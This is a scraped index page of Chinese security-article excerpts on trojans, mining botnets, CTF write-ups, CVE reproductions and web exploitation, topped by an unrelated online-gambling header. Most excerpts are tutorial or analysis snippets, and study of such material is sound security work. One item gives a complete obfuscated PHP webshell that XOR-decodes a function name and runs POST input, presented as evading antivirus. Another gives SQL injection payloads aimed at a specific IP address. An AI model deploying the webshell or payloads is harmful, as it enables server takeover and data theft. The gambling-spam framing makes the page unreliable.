huc惠仲娱乐平台

huc惠仲娱乐官网_huc惠仲娱乐真人视讯_huc惠仲博彩

Gookit Banking Trojan中的后门利用分析

0x00 前言 Gootkit Banking Trojan在2014年被首次发现,最近Daniel Bunce(@ 0verfl0w_)介绍了一些对于Gootkit Banking Trojan的分析,文章地址如下: https://www.sentinelone.com/blog/gootkit-banking-trojan-persistence-other-capabilities/ 其中,Gootkit Banking Trojan使用的后门启动方法是独有的,所以本文仅在技术研究的角度复现Gootkit Banking Trojan使用的后门启动方法,分析利用思路,给出防御和检测的建议。 0x01 简介 本文将要介绍以下内容: · 原理介绍 · inf文件的基础知识 ·&nb


DDG挖矿僵尸网络病毒4004来袭

背景 近日,深信服安全团队接到反馈,某虚拟平台大量机器CPU占用非常高,怀疑中了挖矿病毒。经过安全专家排查,发现还存在ssh爆破行为。进一步分析后,判断其为DDG挖矿病毒。 DDG挖矿病毒(国外称其为Linux.Lady)是一款在Linux系统下运行的恶意挖矿病毒,前期其主要通过ssh爆破,redis未授权访问漏洞等方式进行传播,近年来其更新非常频繁,已经出现多个版本,本次捕获到的是4004版本。 详细分析 本次其相对于以往的版本主要体现在其增加了2个


钓鱼邮件的投递和伪造

前言: 在大型企业边界安全做的越来越好的情况下,不管是APT攻击还是红蓝对抗演练,钓鱼和水坑攻击被越来越多的应用。今天就先来说一下钓鱼这种传统而又有效的方式。 而想要进行一次成功的想要进行一次成功的钓鱼攻击,首先需要了解现在主流的邮件的安全措施。 邮件安全的三大协议 SPF SPF是 Sender Policy Framework 的缩写,一种以IP地址认证电子邮件发件人身份的技术。 接收邮件方会首先检查域名的SPF记录,来确定发件人的IP地址是否被包含


警惕:DDG挖矿僵尸网络利用SSH爆破攻击Linux服务器

一、背景 腾讯安全专家在为某企业客户进行例行安全巡检过程中,发现客户部署的腾讯御界高级威胁检测系统出现了SSH服务失陷感知信息。在征得客户同意后对客户机器进行远程取证,并结合御界的关键日志进行分析,我们发现这是一起针对SSH服务器弱口令爆破攻击事件,由于发现及时,工程师及时协助客户进行隔离及杀毒,并未造成损失。 腾讯安全御见威胁情报中心对本次攻击事件展开调查,结果发现,这是由大型挖矿僵尸网络DDGMiner发起的攻


TokyoWesterns CTF 2019 Asterisk-Alloc题解

0x01 前言 前几天的TokyoWesterns CTF 2019里遇到一道realloc利用的pwn题,比较有意思,这里分享一下解题思路。 题目下载: 链接:https://pan.baidu.com/s/18GQV--52KzWau2AYN99xIA 密码:hbmc 0x02 分析 保护全开 [ *] '/pwn/asterisk_alloc' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 2.27的libc,引入了tcache机制 看到伪代码,提供了malloc、calloc、reallc、free调用 int __cdecl main(int argc, const char **argv, const char **envp) { int v3; /


深入分析CVE-2019-1663漏洞

几个月前,Pentest Partners网站发表了一篇文章,对影响思科的多款低端设备(RV110、RV130和RV225)的堆栈缓冲区溢出漏洞CVE-2019-1663进行了详细的介绍。 实际上,我一直非常怀念分析ARM平台的二进制漏洞的美好时光,这下终于有机会重温旧梦了。 获取一个真实的目标 最初,我是通过一个由QEMU、解压缩的固件和libnvram搭建的平台上复现这个漏洞的攻击过程的,遗憾的是,在这个平台上开发的漏洞利用代码是无法应用于真正的思科设备上的,因为在这个平


code-breaking picklecode中对signed_cookies引擎分析

最近做了 ph 牛的 code-breaking,在做 picklecode 这一题时,没有搞懂那个 django 的 signed_cookies 引擎对 session 的操作,就 debug 了一下,做个总结,算是做了个代码审计吧 0x01 获取 session_auth_hash 题目 : https://github.com/phith0n/code-breaking/tree/master/2018/picklecode django 使用的 SESSION_ENGINE 为 django.contrib.sessions.backends.signed_cookies pycharm 开启 debug 模式,username 为 peri0d,password 为 123456 入口文件在 views.py,第 34 行新建了用户并对密码进行了加密。第 35 行调用 auth_login() 函数


实战LFI+文件上传组合拳拿RCE

要分享这篇Writeup是作者在一次私人赏金项目上发现的,目标网站存在不安全的访问控制措施,可以利用其导致路径遍历(Path Traversal) +任意文件上传,以本地文件包含(LFI)方式,实现远程代码执行(RCE)。此处渗透测试测试是一次非常经典的的LFI+任意文件上传操作。考虑到站点隐私的问题,部分图片会做打码处理。 路径遍历(Path Traversal) 目标站点上有一个名为/se/v92711/generic/gn_deaultframe/2.0/defaultframe_toolbar_load.php的页面,在POST body中,作者发现了一个有


实现系统调用的几种方法

本文,我们将讨论在x86上实现用户到内核转换的许多方法,即系统调用。让我们首先快速回顾一下实际需要完成哪些系统调用。 在现代操作系统中,用户模式(执行普通应用程序代码)和内核模式(能够接触系统配置和设备)是有区别的。系统调用是应用程序从操作系统内核请求服务并弥合它们之间差距的一种方法。为了实现这一点,CPU需要为应用程序提供一种机制,使其能够安全地从用户模式转换到内核模式。 所以在这样的运行环境中,安全是最重要


Apache Axis2的两个利用方式

Apache Axis2的两个利用方式 在渗透测试中,对C段进行扫描,经常会遇见一些Tomcat的后台页面,在一次偶然的机会下,第一次遇见了安装有Apache Axis2服务的tomcat。 确定目标是否存在axis2 直接在URL后面添加/axis2即可。 出现上图即可证明此tomcat安装了axis2服务。 方式1 文件上传漏洞 访问axis2的管理员界面 利用默认密码登录(此为前提条件 admin/axis2) 通过上传点,上传Cat.aar,下载见参考文章处 上传成功后便可利用Cat工具进行进一步利用,可


微信聊天安全加密插件,类似Telegram的端对端安全加密:TgWechat

TgWechat 微信聊天安全加密插件 仅供个人消遣玩耍,请勿用于非法或者商业用途。若用于非法用途,一切后果由使用者承担,与软件作者无关 一款采用Telegram类似的安全加密方案实现的保护个人隐私安全的微信聊天插件。自由切换/端对端加密/安全可靠。不同聊天对象生成不同加密密钥。随意启用或关闭加密功能。传输到微信服务器聊天内容是加密的(不怕私密暴露),本地保存内容明文(方便查看)。不过目前仅支持Windows。功能默认支持多开支持个


利用OpCode绕过Python沙箱

利用OpCode绕过Python沙箱 0x01 OpCode opcode又称为操作码,是将python源代码进行编译之后的结果,python虚拟机无法直接执行human-readable的源代码,因此python编译器第一步先将源代码进行编译,以此得到opcode。例如在执行python程序时一般会先生成一个pyc文件,pyc文件就是编译后的结果,其中含有opcode序列。 如何查看一个函数的OpCode? def a (): if 1 == 2 : print ( "flag{****}" ) print "Opcode of a():" , a . __code__ . co_code . encode ( 'hex' ) 通过此方法我们可以得到a函


v33异或免杀PHP一句话

venom 33的更新,webshell免杀PHP一句话,体积更小了。<?phpclass VMTX{ function __destruct(){ $BRLI='f$vjcT'^"\x7\x57\x5\xf\x11\x20"; return @$BRLI("$this->EKDL"); }}$vmtx=new VMTX();@$vmtx->EKDL=isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6'];?>12345678910<?phpclass VMTX {     function __destruct ( ) {         $BRLI = 'f$vjcT' ^ "\x7\x57\x5\xf\x11\x20" ;         return @ $BRLI ( "$this->EKDL" ) ;     }}$vmtx


[红日安全]Web安全Day3 - CSRF实战攻防

本文由红日安全成员: Once 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、Python靶场基本上三种靶场全部涵盖)-实战演练(主要选择相应CMS或者


SuiteCRM CMS 漏洞复现

前言 最近 rips 发布了 SuiteCRM 的漏洞,但是细节不太清晰,于是上手分析了一下,漏洞还是很有意思的,记录一下。 文章:https://blog.ripstech.com/2019/breaking-into-your-internal-network/ 这个漏洞还是比较有趣的,可以想想这个漏洞形成的原因,这个漏洞主要是因为没有过滤一些敏感的值,table_name 也应该设置成 private 属性。形成这个漏洞的函数也是在文件内的,因为代码量比较多,审计的时候其实可以结合扫描器直接找到可能存在变量覆盖的点。 漏洞分析


SSRF in the Wild: A totally unscientific analysis of those S...

原文地址:https://medium.com/swlh/ssrf-in-the-wild-e2c598900434 在本文中,我们将与读者一道,深入了解已公开披露的各种SSRF漏洞的详情,其中包括这些漏洞是在哪里找到的、漏洞的严重性以及供应商所采取的补救措施,等等。 Why I did this ============== 几个月前,我下定决心要深入学习一下SSRF漏洞方面的知识。 朋友们,你们是否体验过想要理解一个概念,却又无法完全掌握时的感受吗?好吧,我说的就是SSRF。后来,我想通了——搞定SSRF的最好方式,就


深入剖析线程与进程句柄泄露漏洞(上)

多年来,笔者曾经遇到并利用过一些句柄泄露漏洞。当然,这些过程也特别有趣,因为并不是所有的句柄都被授予了`PROCESS_ALL_ACCESS`或`THREAD_ALL_ACCESS`权限,所以,要想顺利利用,还是要开动脑筋的。在这篇文章中,我们将为读者介绍句柄的各种访问权限,以及如何利用这些权限来实现代码执行。在这里为,我们将重点关注进程和线程句柄,因为这些是最常见的,当然,其他对象的句柄也可以以类似的方式加以利用。  虽然这种漏洞可能在各种情况


利用Apache Nginx 的lua 模块的鸡肋权限维持的方法

利用IIS的端口共享功能绕过防火墙 看了嘶吼的这篇文章,稍微思考了一下。是否Nginx 或者Apahce 是否存在这种方式。 Nginx 和apache 作为全球使用最多的两个WEB容器。是支持模块化的一个方式建立中间件的 例如 Nginx_lua 的防火墙就是一个最好的案例。 那么如果利用这种方式做一个权限控制呢。 下载做一个实验吧,此文只是给大家一个思考的,并不建议实际运用中 实验服务器Centos 7.4 WEB容器Apache 2.4.39 服务器面板:宝塔面板6.9 首先安装一下 Ap


某php 远程代码执行审计

又看到了cnvd中的一个有趣的洞! zzzphp zzzphp是一款php语言开发的免费建站系统,以简单易上手的标签、安全的系统内核、良好的用户体验为特点,是站长建站的最佳选择。 晚上8点,做完作业发现cnvd报了一个命令执行,本着两天不看代码看不懂的精神赶紧再来看下审计。 产生原因 zzzphp的模板是通过自写函数来进行解析的,过滤参数不严谨导致可以执行任意php代码。 漏洞分析 程序入口index.php引入require 'inc/zzz_client.php'; E:\code\php\zzzphp\inc\zzz_client.ph


SpiderMonkey 漏洞利用简介(一)

注:本文是一篇翻译文章,原文链接:https://doar-e.github.io/blog/2018/11/19/introduction-to-spidermonkey-exploitation/#jsvalues-and-jsobjects 由于文章比较长,译者将其分为三部分,第一步分解释基础的知识点和背景;第二部讲解利用过程,第三部分结论及其他内容。 介绍 这个博客文章介绍了针对 SpiderMonkey JavaScript Shell 解释器和 Windows 10 RS5 64 位 Mozilla Firefox 的三个漏洞的开发,从一个从未编写过浏览器漏洞利用的人的角度来写,也没有密切关注任何 JavaScript 引擎代码


SUCTF 2019 出题笔记 & phar 反序列化的一些拓展

这次我给 SUCTF 出了三道 Web,分别是 CheckIn 、 pythonginx 、 Upload Labs 2,下面聊一下出题时候的一些思路以及随想,还有最近对于 phar 的一些深入挖掘。//看的时候请师傅们先放下手里的西瓜刀... CheckIn 关于 CheckIn 这道题,是我在看 php 文档时候翻到的一个关于 .user.ini 的说明,然后参考了 user.ini文件构成的PHP后门),因为是比较久远的东西了,而且我看很多什么上传教程,甚至我认为总结比较全面的upload labs都未曾提及到这个 trick ,而且回忆了一下以及


一道题引发的无列名注入

@Syst1m的考核题 题目地址 http://152.136.179.79:18084/ 传入id=3为flag的id。 常规联合查询注入 http://152.136.179.79:18084/?id=3 union select 1,2,3 三个字段 http://152.136.179.79:18084/?id=3 union select 1,2,(select table_name from information_schema.tables where table_schema=database()) 拿到flag所在的表,继续查列名 http://152.136.179.79:18084/?id=3 union select 1,2,(select column_name from information_schema.columns where table_name='this_1s_th3_fiag_tab13') 死活查不出来,应该是过滤了column关键字,没有列名怎么查出来数据


渗透测试初期之信息收集

前言 在渗透测试中,信息收集是第一步,也是至关重要的一步。信息收集可以让我们对目标的整体有大概的了解,从而选择出较为薄弱的方向进行进一步渗透。 本文从ip收集、端口扫描、子域收集、web技术确认、url收集等五个方面来进行对信息收集进行详细说明。 ip收集 随着内容分发网络(CDN)的大量应用,对渗透测试造成了进一步的困难,而收集ip既能扩大渗透范围又有可能找出CDN后真正的服务器。 https://apps.db.ripe.net/收集了全球大量ipv4、ipv


Webmin <=1.920 远程命令执行漏洞 - 【CVE-2019-15107】

0x01 漏洞复现 测试版本:webmin 1.920 测试环境:Ubuntu 漏洞需要开启密码重置功能。在控制界面 https://ip:10000/webmin/edit_session.cgi?xnavigation=1 等待webmin重启,配置生效。查看webmin的配置文件,可以发现passwd_mode的值已经从0变为了2。 # cat /etc/webmin/miniserv.conf ... passwd_mode=2 ... 抓取到如下数据包: POST /password_change.cgi HTTP/1.1 Host: yourip:10000 Connection: close Content-Length: 63 Cache-Control: max-age=0 Origin: https://yourip:10000 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-fo


逆向学习之画堆栈图一

一. 程序以及要求 从0x401168开始 工具:DTDebug 调试程序: helloword.exe 见附件下载 二. 开始打开程序找到0x401168 双击打开DTDebug 接着将helloword.exe程序拖入DTDebug,或者F3打开helloword程序 现实是77开头的,修改成00开头的,如下图设置,然后重启 用control+g 找到对应的位置 在开始的位置按下F2下断点,可以看到背景变成了红色 点这个箭头,让程序走到下断点的地方,背景变成了黑色 三,开始画堆栈图 首先画现在的栈即此时ESB和EBP的值 按两次F8


从 XSS Payload 学习浏览器解码

前几天看了浏览器解码看XSS,没有看得很明白,又找了这篇深入理解浏览器解析机制和XSS向量编码,翻译的文章,有些地方翻译的怪怪的,需要看下原文,啃了2天终于搞明白了 原文里给出了几个XSS Payload,也给出了答案和演示地址,有答案但没解析,下面一个个分析 有点像上学的时候,看书看不懂,做题不会做,看答案解析做题就懂了 Basics 1 < a href = "%6a%61%76%61%73%63%72%69%70%74:%61%6c%65%72%74%28%31%29" ></ a > URL encoded "javascript:alert(1)" Answer: The


电商数据安全迎重考,看逸仙如何让自己更完美!

与数据保护相关的法律法规已经出台了不少,但是针对电商行业的个人信息保护,还得数今年1月施行的《电子商务法》最为严格。电商企业因业务需要拥有比大部分企业更多的用户数据,这些数据信息都需要相关平台进行严密保护。 当务之急的信息安全   每次看到新闻报道某电商平台的用户的账户信息、银行信息、交易数据、个人隐私信息被窃取,都不得不关心下自个的信息是否在其中。购物信息被泄露所带来的骚扰诈骗已经引起了很多消费者


对云计算的巨大威胁:Rocke恶意组织调查报告

执行摘要 Unit 42团队用了六个月的时间研究了位于中国的网络犯罪集团Rocke,该恶意组织是针对云计算领域最著名的威胁行为者。在我们最近发布的云威胁报告中,发布了对Rocke的调查结果。该研究报告深入分析了我们针对Rocke的调查结果,发现该恶意组织可以在几乎没有干扰和有限检测风险的情况下开展业务。 通过对2018年12月至2019年6月16日的NetFlow数据进行分析,我们发现在分析的云环境中,有28.1%至少存在一个完全建立的网络连接,至少有一个已知


GPS卫星信号劫持

GPS卫星信号劫持 一、简单原理阐述 其实GPS劫持就是用到了所有接收GPS信号的设备会默认当前信号最强的设备为数据接收点, 所以这才给了GPS信号劫持的机会。 在进行GPS劫持的时候,攻击者首先需要去NSAS的ftp服务器上去下载当天的最新的GPS导航电文, 下载此文件的目的是在后期使用自动化脚本修改其中的经纬度等重要数据。 二、详细攻击过程 伪造动态轨迹 步骤1:伪造运动轨迹 此步骤中需要在本机中安装Google Earth Google Earth 安装地址:https://


利用Bundle反序列化过程中不安全的Parcelable实现进行权限提升

4月中旬,我们发布了有关Android.InfectionAds.1木马的新闻,该木马利用了Android中的几个关键漏洞。其中,CVE-2017-13156(也被称为Janus)允许恶意软件在不破坏数字签名的情况下感染APK文件。另一个是CVE-2017-13315,允许恶意软件扩展权限,因此它可以在不影响用户的情况下,隐蔽的安装和卸载应用程序。有关Android.InfectionAds.1的详细分析请点此,本文我们将讨论CVE-2017-13315漏洞,并了解它的具体功能。 CVE-2017-13315属于一组称为EvilParcel的漏洞,它们存在于各种Andro